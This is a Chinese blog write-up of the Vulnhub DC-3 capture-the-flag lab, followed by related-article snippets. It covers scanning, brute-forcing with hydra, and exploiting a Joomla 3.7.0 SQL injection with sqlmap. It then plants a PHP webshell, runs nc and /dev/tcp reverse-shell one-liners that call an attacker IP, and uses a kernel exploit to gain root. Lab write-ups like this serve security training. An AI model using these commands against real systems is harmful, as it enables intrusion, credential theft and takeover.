靶机渗透之DC-3

于 2024-03-23 19:01:16 发布
阅读量878 收藏 12
点赞数 28
分类专栏: 靶机渗透 文章标签: linux 网络安全 ubuntu web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76227305/article/details/136921943
版权
文章详细描述了渗透测试过程中,从信息收集、识别JoomlaCMS、SQL注入漏洞利用,到爆破登录凭证、获取shell并最终提权的过程,涉及了多个IT技术工具如Nmap、Joomscan、JohntheRipper和Linux漏洞利用方法。
摘要由CSDN通过智能技术生成

一、信息收集

这里扫一下网段,发现靶机地址为192.168.145.232

nmap -sP 192.168.145.*

再扫一下端口,发现靶机开放了80端口

nmap -sT -T4 -p1-65535 192.168.145.232

然后我这里又扫描了一下网站目录

dirb http://192.168.145.232

然后扫出一个网址,估计是网址后台的地址

浏览器打开看看有啥,是个登录页面,先不管它,待会看看能不能爆破一下

看看网站的cms,是joomla框架,系统为ubuntu

二、开始渗透

现在我们都把基本的信息收集完了,包括开放的端口、靶机系统、网站目录、cms等,然后我翻译了一下网站首页的英文,这个没有提示只能靠我们自己了。现在我们便可以开始渗透了

先试试能不能爆破出登录账号和密码,F12查看源码,发现是post提交登录的

然后我们用九头蛇爆破一下

hydra -L userList.txt -P passwd.txt -t 1 192.168.145.232 http-post-form "/:username=^admin^&password=^PASS^:Error"

爆破出一堆账号密码,但是没一个是对的,说明弱口令爆破不行

既然不行那我们看看它后台的页面,也是一个登录页面

这里我又用九头蛇爆破了一下,也是爆破出一堆账号密码,但是依旧登陆不了啊。然后我就随便访问了一些网站目录,找到一堆文件,但是没啥用啊

然后想起它的cms是joomla,我就查了一下看看有没有专门扫描joomla的工具,没想到还真有啊。就是joomscan这个工具,那我们用它来扫一下这个网站

joomscan -u http://192.168.145.232/

这里可以扫描出它的joomla版本为3.7.0

去网上找找这个版本的joomla有无漏洞啥的,然后还真找到了,这个版本的joomla存在一个sql注入漏洞

再从网上找一下爆出的注入点

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]"

然后sqlmap跑一下,先爆库。

sqlmap -u  "http://192.168.145.232:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" --dbs

再爆表,其中有一个名为#_users的表

sqlmap -u  "http://192.168.145.232:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D "joomladb" --tables

最后再把这个表里面的列给爆出来,注意这里有个小坑,#__users是两个下划线滴

sqlmap -u  "http://192.168.145.232:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D joomladb -T '#__users' --columns

最后再把username、password、email这几列的内容爆一下,爆出的密码是经过hash加密的

sqlmap -u  "http://192.168.145.232:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D joomladb -T '#__users' -C username,password,email --dump

我们使用john这个专门爆破哈希的工具来爆破密码,把密码放在password.txt里面

然后输入命令爆破

john --wordlist=/usr/share/john/password.lst --rules password.txt

因为我这里已经爆破过一次了,所以再次爆破的话会这样子

这个输入命令重新显示我们之前爆破过的密码即可,然后我们这里得到密码为snoopy

john --show password.txt

这时我们有了密码和账户,就可以去登录网站后台了,如果是登录网站的话里面没有东西。下面是成功登录的后台

三、getshell

现在我们要通过这个网站来获取到靶机的shell,先看看有没有文件上传的地方,通过我的不屑努力,终于在扩展->模板->第一个模板样式里面找到一个文件上传的地方

这里我试了试上传文件发现不行,但它这里可以新建文件,那我们就新建一个post.php然后写入一句话木马,下面是我已经写入的

现在我们已经把木马写入了,但是还不知道我们木马的路径,上网查查看能不能找到这个模板的存储路径。然后也是找到了好吧,路径为/templates/beez3。然后我们访问一下写入的木马,也是成功访问

最后蚁剑连接即可

四、提权

进入虚拟终端,先去看看root里面有无flag,但是没权限,好吧先提权

一开始我是直接在蚁剑这里提权的,但是不行,看了一下别人的文章他是这样说的,因为HTTP是瞬时协议,我这边正提权呢,你那边TCP四次挥手断开连接了,不能持久连接,所以蚁剑的作用就在于上传文件来反弹shell。好吧,既然蚁剑不行,那我们nc连接一下。发现靶机有nc,但是没有-e参数

直接祭出nc反弹shell常用命令

# 本地监听2333 端口
ncat -lnvp 2333

# 服务端反弹
nc -e /bin/bash 192.168.16.100 2333
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.100 2333>/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.16.100 2333>/tmp/f
/bin/sh -i >& /dev/tcp/192.168.16.100/2333 0>&1

kali输入命令监听2333端口

nc -lnvp 2333

蚁剑那里输入

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.145.171 2333>/tmp/f

成功连接后再输入命令建立个交互式的shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

老规矩看看有无啥suid提权的命令,发现有个sudo

find / -perm -u=s -type f 2>/dev/null

看看sudo配置了啥命令,没想到还要输入密码,那应该是看不了了

sudo -l

看看sudoers,没权限。那看来suid和sudo提权都不行了

靠自己就只能走到这里了,然后就去看了下别人的wp,说是要利用系统漏洞提权。这里有两种方法发现漏洞,一个是用工具,一个是从kali漏洞库里面找。 linux-exploit-suggester这个脚本是用来检测系统是否存在cve漏洞,我们直接通过蚁剑上传到tmp目录,因为这个目录是存放零时文件的普通用户也有权限。

直接运行脚本,可以看到其系统漏洞还是挺多的,这里用这个CVE-2016-4557(注意漏洞存在的发行版本和内核版本要和靶机的一致)

./tiquan.sh

把它那个url里面给出的39772.zip下载到靶机里面,直接wget就行

这个我们在kali里面搜一下这个编号为39772的提权脚本怎么用,不知道为啥我这里路径显示不完整,正确的路径是这个/usr/share/exploitdb/exploits/linux/local/39772.txt,只要是提权脚本的使用方法,kali里面都是这个路径

searchsploit 39772

打开39772.txt看看,这里要我们进入ebpf_mapfd_doubleput_exploit里面先运行compile.sh再运行doubleput.sh,我们直接按照它说的来做就行

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

先在靶机上解压刚刚下载的压缩包,解压后发现里面是2个压缩包

unzip 39772.zip

再继续解压exploit.tar这个文件,就会得到ebpf_mapfd_doubleput_exploit,然后我们进入里面运行脚本,先运行compile.sh

再运行doubleput.sh,然后便成功提权

最后再进入root里面便可找到flag

顺便说一下从kali漏洞库里面找到相对应的漏洞,其实和用脚本找漏洞差不多的,先查看靶机发现版本,这里是ubuntu16.04

cat /etc/*release

再看看其内核版本,版本为4.4.0-21

在kali漏洞库找找这个发型版本的漏洞,也是有挺多的,发现有我们刚刚脚本找到的那个漏洞,可以用这个也可以试试其他的,这里我就不试了。后面漏洞提权的步骤和上面的一样就不多说了。

searchsploit ubuntu 16.04

五、总结

这个靶机比DC2和DC1稍微难点,主要涉及joomscan、john、 linux-exploit-suggester等工具的使用,还涉及系统漏洞提权。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习

脸红ฅฅ*的思春期
关注
专栏目录
DC-3靶机渗透
weixin_45442394的博客
06-14 757
1 获取ip 开机前一直按shift或Esc键 ro recovery nomodeset改为quiet splash rw init=/bin/bash 更改后按F10 重启虚拟机 2 端口扫描 3 服务确认 4 网站目录扫描 5 查看页面 joomscan扫描 joomscan --url http://192.168.182.139 -ec 查看版本漏洞 查看文档 6 SQL注入 数据库名 sqlmap -u “http://192.168.182.139/index.php?o
DC-3靶场渗透
最新发布
一纸荒芜的博客
12-12 3589
DC3靶场打靶记录!
DC系列靶机渗透DC-3
weixin_52515588的博客
06-08 432
利用arp -scan -l扫描主机然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透访问一下80端口得到如上图所示的信息。然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描 利用扫描工具扫出了网站后台,我们利用浏览器登录 如上图所示。我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 我们发现存在sql注入漏洞根据提示的路径,我们查看文件内容如
DC-3靶机渗透实战
littlecjx
08-06 1299
DC-3靶机渗透实战 0x00 信息收集 使用arp-scan查看局域网内所有主机IP,定位到目标主机IP。 使用nmap扫描端口服务,发现只有80端口开放,服务应该是Joomla。 使用dirsearch进行路径爆破,发现administrator后台路径,访问http://192.168.1.31/administrator 访问之后发现是Joomla建站系统,但是登录页面没有版本信息。 回想起刚才爆破的路径有,/README.txt,访问看看,可以看到版本号为3.7。 此外,可以使用JoomSc
DC-3靶机渗透测试
来日可期的博客
08-09 1895
searchsploit是一款kali自带的搜索漏洞信息的模块。可参考searchsploit漏洞查找工具使用指南。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-3完整的渗透测试过程
weixin_51097397的博客
07-26 1401
1.此次DC-3的渗透用到了如下几种工具的基础使用①arp-scan②namp③dirsearch⑤sqlmap⑥john⑦nc2.学到了如何用文件上传反弹shell?> #反弹shell脚本nc -lvvp 6666 #kali里nc开启监听3.学会用searchsploit搜索系统漏洞进行提权cat /proc/version #查看系统版本信息 cat /etc/issue。
靶机DC-3—WP
m0_66638011的博客
05-17 1629
DC系列靶机是一系列专门为渗透测试网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试
dc-1 靶机渗透学习
..
03-11 3213
环境: Vmware 虚拟机软件 dc -1 靶机ip地址:192.168.202.130 kali攻击机ip地址:192.168.202.129 本次渗透过程kali攻击机和dc靶机都采取NAT模式 信息收集 首先用ipconfig查看当前kali机所处网段。 得到当前kali机的ip地址后,用nmap对当前网段进行扫描,主机探活。 nmap超详细使用教程_Kris__zhang的博客-CSDN博客_nmap使用教程 nmap -sP 192.168.202.0/24 .
如何扫描网页后台地址
m0_74887243的博客
02-04 4281
后台扫描
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 840
快速打通靶机
靶机一:BOREDHACKERBLOG_ SOCIAL NETWORK
travelnight的博客
11-08 2051
靶机一:BOREDHACKERBLOG: SOCIAL NETWORK 靶机渗透
渗透测试中的信息收集(使用相关工具,收集网站的子域名,扫描网站的后台地址)
net的博客
01-14 3274
(1)子域名收集的意义收集子域名的操作也叫子域名爆破,顾名思义,就是「枚举」所有可能存在的子域名(实用工具枚举,下面会演示两种工具)。通常,一台服务器上有很多个站点,这些站点之间没有必然的联系,是相互独立的,使用的是不同的域名(甚至端口都不同),但是它们却共存在一台服务器上。如果我们要对某一个站点进行直接渗透无法突破时,那么我们可以对同服务器的其他站点进行渗透,只要能打破一个缺口,就能沦陷服务区上的整个站点,甚至是一个集群。(2)为什么要进行敏感信息收集。
小白的靶机-VulnHub-W1R3S
wo41ge的博客
12-14 351
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 开机界面 就是个这 确定靶机地址:192.168.120.134 使用namp进行全盘扫面 开放了21,22,80,3306端口 80端口 竟然在 那就上web页面呗 翻了半天 每个锤子东西 使用dirb工具攻击目录 命令:dirb http://192.168.120.134 找到了几个重要的目录,/administrator、/insta
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值